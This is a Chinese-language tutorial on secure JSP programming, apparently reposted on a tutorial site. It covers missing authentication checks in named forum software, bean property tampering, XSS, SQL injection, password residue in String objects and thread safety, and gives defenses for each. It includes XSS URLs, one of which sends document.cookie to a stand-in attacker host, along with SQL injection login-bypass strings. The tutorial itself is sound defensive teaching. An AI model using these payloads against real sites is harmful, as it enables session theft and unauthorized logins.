JSP安全编程实例浅析

2016-02-19 19:28 3 1 收藏

下面图老师小编要向大家介绍下JSP安全编程实例浅析,看起来复杂实则是简单的,掌握好技巧就OK,喜欢就赶紧收藏起来吧!

【 tulaoshi.com - Web开发 】

  Java Server Page(JSP)作为建立动态网页的技术正在不断升温。JSP和ASP、PHP、工作机制不太一样。一般说来,JSP页面在执行时是编译式,而不是解释式的。首次调用JSP文件其实是执行一个编译为Servlet的过程。当浏览器向服务器请求这一个JSP文件的时候,服务器将检查自上次编译后JSP文件是否有改变,如果没有改变,就直接执行Servlet,而不用再重新编译,这样,效率便得到了明显提高。

  今天我将和大家一起从脚本编程的角度看JSP的安全,那些诸如源码暴露类的安全隐患就不在这篇文章讨论范围之内了。写这篇文章的主要目的是给初学JSP编程的朋友们提个醒,从一开始就要培养安全编程的意识,不要犯不该犯的错误,避免可以避免的损失。另外,我也是初学者,如有错误或其它意见请发帖赐教。

  一、认证不严——低级失误

  在溢洋论坛v1.12 修正版中,

  user_manager.jsp是用户管理的页面,作者知道它的敏感性,加上了一把锁:

  if ((session.getValue("UserName")==null)││(session.getValue("UserClass")==null)││(! session.getValue("UserClass").equals("系统管理员")))
  {
   response.sendRedirect("err.jsp?id=14");
   return;
  } 

  如果要查看、修改某用户的信息,就要用modifyuser_manager.jsp这个文件。管理员提交
  http://www.somesite.com/yyforum/modifyuser_manager.jsp?modifyid=51
  就是查看、修改ID为51的用户的资料(管理员默认的用户ID为51)。但是,如此重要的文件竟缺乏认证,普通用户(包括游客)也直接提交上述请求也可以对其一览无余(密码也是明文存储、显示的)。modifyuser_manage.jsp同样是门户大开,直到恶意用户把数据更新的操作执行完毕,重定向到user_manager.jsp的时候,他才会看见那个姗姗来迟的显示错误的页面。显然,只锁一扇门是远远不够的,编程的时候一定要不厌其烦地为每一个该加身份认证的地方加上身份认证。

  二、守好JavaBean的入口

  JSP组件技术的核心是被称为bean的java组件。在程序中可把逻辑控制、数据库操作放在javabeans组件中,然后在JSP文件中调用它,这样可增加程序的清晰度及程序的可重用性。和传统的ASP或PHP页面相比,JSP页面是非常简洁的,因为许多动态页面处理过程可以封装到JavaBean中。

  要改变JavaBean属性,要用到“<jsp:setProperty>”标记。

  下面的代码是假想的某电子购物系统的源码的一部分,这个文件是用来显示用户的购物框中的信息的,而checkout.jsp是用来结帐的。

  <jsp:useBean id="myBasket" class="BasketBean">
  <jsp:setProperty name="myBasket" property="*"/>
  <jsp:useBean>
  <html>
  <head><title>Your Basket</title></head>
  <body>
  <p>
  You have added the item
  <jsp::getProperty name="myBasket" property="newItem"/>
  to your basket.
  <br/>
  Your total is $
  <jsp::getProperty name="myBasket" property="balance"/>
  Proceed to <a href="checkout.jsp">checkout</a>

  注意到property="*"了吗?这表明用户在可见的JSP页面中输入的,或是直接通过Query String提交的全部变量的值,将存储到匹配的bean属性中。

  一般,用户是这样提交请求的:

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/webkaifa/)

  http://www.somesite.com /addToBasket.jsp?newItem=ITEM0105342 

  但是不守规矩的用户呢?他们可能会提交:

(本文来源于图老师网站,更多请访问http://www.tulaoshi.com/webkaifa/)

  http://www.somesite.com /addToBasket.jsp?newItem=ITEM0105342&balance=0 

  
  这样,balance=0的信息就被在存储到了JavaBean中了。当他们这时点击“chekout”结账的时候,费用就全免了。

  这与PHP中全局变量导致的安全问题如出一辙。由此可见:“property="*"”一定要慎用!
  三、长盛不衰的跨站脚本

  跨站脚本(Cross Site Scripting)攻击是指在远程WEB页面的HTML代码中手插入恶意的JavaScript, VBScript, ActiveX, HTML, 或Flash等脚本,窃取浏览此页面的用户的隐私,改变用户的设置,破坏用户的数据。跨站脚本攻击在多数情况下不会对服务器和WEB程序的运行造成影响,但对客户端的安全构成严重的威胁。

  以仿动网的阿菜论坛(beta-1)举个最简单的例子。当我们提交

  http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>alert(document.cookie)</script> 

  便能弹出包含自己cookie信息的对话框。而提交

  http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location='http://www.163.com'</script> 

  就能重定向到网易。

  由于在返回“name”变量的值给客户端时,脚本没有进行任何编码或过滤恶意代码,当用户访问嵌入恶意“name”变量数据链接时,会导致脚本代码在用户浏览器上执行,可能导致用户隐私泄露等后果。比如下面的链接:

  http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location='http://www.hackersite.com/xxx.xxx?'+document.cookie</script> 

  xxx.xxx用于收集后边跟的参数,而这里参数指定的是document.cookie,也就是访问此链接的用户的cookie。在ASP世界中,很多人已经把偷cookie的技术练得炉火纯青了。在JSP里,读取cookie也不是难事。当然,跨站脚本从来就不会局限于偷cookie这一项功能,相信大家都有一定了解,这里就不展开了。

  对所有动态页面的输入和输出都应进行编码,可以在很大程度上避免跨站脚本的攻击。遗憾的是,对所有不可信数据编码是资源密集型的工作,会对 Web 服务器产生性能方面的影响。常用的手段还是进行输入数据的过滤,比如下面的代码就把危险的字符进行替换:

  <% String message = request.getParameter("message");
  message = message.replace ('<','_');
  message = message.replace ('>','_');
  message = message.replace ('"','_');
  message = message.replace (''','_');
  message = message.replace ('%','_');   [转自:51item.net] 
  message = message.replace (';','_');
  message = message.replace ('(','_');
  message = message.replace (')','_');
  message = message.replace ('&','_');
  message = message.replace ('+','_'); %> 

  更积极的方式是利用正则表达式只允许输入指定的字符:

  public boolean isValidInput(String str)
  {
   if(str.matches("[a-z0-9]+")) return true;
   else return false;
  } 

  四、时刻牢记SQL注入

  一般的编程书籍在教初学者的时候都不注意让他们从入门时就培养安全编程的习惯。著名的《JSP编程思想与实践》就是这样向初学者示范编写带数据库的登录系统的(数据库为MySQL):

  Statement stmt = conn.createStatement();
  String checkUser = "select * from login where username = '" + userName + "' and userpassword = '" + userPassword + "'";
  ResultSet rs = stmt.executeQuery(checkUser);
  if(rs.next())
   response.sendRedirect("SuccessLogin.jsp");
  else
   response.sendRedirect("FailureLogin.jsp"); 

  这样使得尽信书的人长期使用这样先天“带洞”的登录代码。如果数据库里存在一个名叫“jack”的用户,那么在不知道密码的情况下至少有下面几种方法可以登录:

  用户名:jack
  密码:' or 'a'='a
  用户名:jack
  密码:' or 1=1/*
  用户名:jack' or 1=1/*
  密码:(任意)
  lybbs(凌云论坛)ver 2.9.Server在LogInOut.java中是这样对登录提交的数据进行检查的:
  if(s.equals("") ││ s1.equals(""))
  throw new UserException("用户名或密码不能空。");
  if(s.indexOf("'") != -1 ││ s.indexOf(""") != -1 ││ s.indexOf(",") != -1 ││ s.indexOf("") != -1)
  throw new UserException("用户名不能包括 ' " , 等非法字符。");
  if(s1.indexOf("'") != -1 ││ s1.indexOf(""") != -1 ││ s1.indexOf("*") != -1 ││ s1.indexOf("") != -1)
  throw new UserException("密码不能包括 ' " * 等非法字符。");
  if(s.startsWith(" ") ││ s1.startsWith(" "))
  throw new UserException("用户名或密码中不能用空格。"); 

  但是我不清楚为什么他只对密码而不对用户名过滤星号。另外,正斜杠似乎也应该被列到“黑名单”中。我还是认为用正则表达式只允许输入指定范围内的字符来得干脆。

  这里要提醒一句:不要以为可以凭借某些数据库系统天生的“安全性”就可以有效地抵御所有的攻击。pinkeyes的那篇《PHP注入实例》就给那些依赖PHP的配置文件中的“magic_quotes_gpc = On”的人上了一课。

  五、String对象带来的隐患

  Java平台的确使安全编程更加方便了。Java中无指针,这意味着 Java 程序不再像C那样能对地址空间中的任意内存位置寻址了。在JSP文件被编译成 .class 文件时会被检查安全性问题,例如当访问超出数组大小的数组元素的尝试将被拒绝,这在很大程度上避免了缓冲区溢出攻击。但是,String对象却会给我们带来一些安全上的隐患。如果密码是存储在 Java String 对象中的,则直到对它进行垃圾收集或进程终止之前,密码会一直驻留在内存中。即使进行了垃圾收集,它仍会存在于空闲内存堆中,直到重用该内存空间为止。密码 String 在内存中驻留得越久,遭到窃听的危险性就越大。更糟的是,如果实际内存减少,则操作系统会将这个密码 String 换页调度到磁盘的交换空间,因此容易遭受磁盘块窃听攻击。为了将这种泄密的可能性降至最低(但不是消除),您应该将密码存储在 char 数组中,并在使用后对其置零(String 是不可变的,无法对其置零)。

  六、线程安全初探

  “JAVA能做的,JSP就能做”。与ASP、PHP等脚本语言不一样,JSP默认是以多线程方式执行的。以多线程方式执行可大大降低对系统的资源需求,提高系统的并发量及响应时间。线程在程序中是独立的、并发的执行路径,每个线程有它自己的堆栈、自己的程序计数器和自己的局部变量。虽然多线程应用程序中的大多数操作都可以并行进行,但也有某些操作(如更新全局标志或处理共享文件)不能并行进行。如果没做好线程的同步,在大并发量访问时,不需要恶意用户的“热心参与”,问题也会出现。最简单的解决方案就是在相关的JSP文件中加上: <%@ page isThreadSafe="false" %>指令,使它以单线程方式执行,这时,所有客户端的请求以串行方式执行。这样会严重降低系统的性能。我们可以仍让JSP文件以多线程方式执行,通过对函数上锁来对线程进行同步。一个函数加上synchronized 关键字就获得了一个锁。看下面的示例:

  public class MyClass{
  int a;
  public Init() {//此方法可以多个线程同时调用
   a = 0;
  }
  public synchronized void Set() {//两个线程不能同时调用此方法
   if(a>5) {
  a= a-5;
   }
  }
  } 

  但是这样仍然会对系统的性能有一定影响。一个更好的方案是采用局部变量代替实例变量。因为实例变量是在堆中分配的,被属于该实例的所有线程共享,不是线程安全的,而局部变量在堆栈中分配,因为每个线程都有它自己的堆栈空间,所以这样线程就是安全的了。比如凌云论坛中添加好友的代码:

  public void addFriend(int i, String s, String s1)
  throws DBConnectException
  {
   try
   {
  if……
  else
  {
   DBConnect dbconnect = new DBConnect("insert into friend (authorid,friendname) values (?,?)");
   dbconnect.setInt(1, i);
   dbconnect.setString(2, s);
   dbconnect.executeUpdate();
   dbconnect.close();
   dbconnect = null;
  }
   }
   catch(Exception exception)
   {
  throw new DBConnectException(exception.getMessage());
   }
  } 

  下面是调用:

  friendName=ParameterUtils.getString(request,"friendname");
  if(action.equals("adduser")) {
   forumFriend.addFriend(Integer.parseInt(cookieID),friendName,cookieName);
   errorInfo=forumFriend.getErrorInfo();
  } 

  如果采用的是实例变量,那么该实例变量属于该实例的所有线程共享,就有可能出现用户A传递了某个参数后他的线程转为睡眠状态,而参数被用户B无意间修改,造成好友错配的现象。

来源:http://www.tulaoshi.com/n/20160219/1621092.html

延伸阅读
浅析VC与Matlab联合编程 作者:邓科 在“浅析VC与Matlab联合编程<一”和“浅析VC与Matlab联合编程<二”中介绍了matcom,这个工具可以将用matlab写的m文件翻译成C++文件,或者是可执行文件(exe)或库文件(dll)。但是matcom在很多方面也有限制,比如,对struct等类的支持有缺陷,部分绘图语句无...
多线程是许多操作系统所具有的特性,它能大大提高程序的运行效率,所以多线程编程技术为编程者广泛关注。目前微软的.Net战略正进一步推进,各种相关的技术正为广大编程者所接受,同样在.Net中多线程编程技术具有相当重要的地位。本文我就向大家介绍在.Net下进行多线程编程的基本方法和步骤。    开始新线程    ...
标签: Delphi
  Delphi作为一门新起的Windows编程语言,由于其集众多的优秀特性于一身,因而越来越得到广大编程人员和发烧友的青睐。以下十则技巧涉及的面比较广泛,希望能够对Delphi的爱好者有所裨益。 1.类似于vb.中的doevents功能。 大家或许发现,在Delphi中没有类似于vb.中的doevents函数,这样有的时候,我们将无法使Windows响应...
标签: Java JAVA基础
  选择自 hf1650 的 Blog 一、概述 当网络编程越来越方便,系统功能越来越强大,安全性却指数倍地下降。这恐怕就是网络编程的不幸和悲哀了。各种动态内容生成环境繁荣了WWW,它们的设计目标就是为了给开发者更多的力量,给最终用户更多的方便。正因为如此,系统设计师和开发者必须明确地把安全问题作为一个考虑因素,事后追悔很...
bash编程 --------------------------------------------------------------------------------時間:2004/03/02 來源:不详 Shell Script(bash)简介 众所皆知地,UNIX上以小工具著名,利用许多简单的小工具,来完成原本需要大量软体开发的工作,这一点特色,使得UNIX成为许多人心目中理想的系统平台。 在众多的小工具中,...

经验教程

343

收藏

85
微博分享 QQ分享 QQ空间 手机页面 收藏网站 回到头部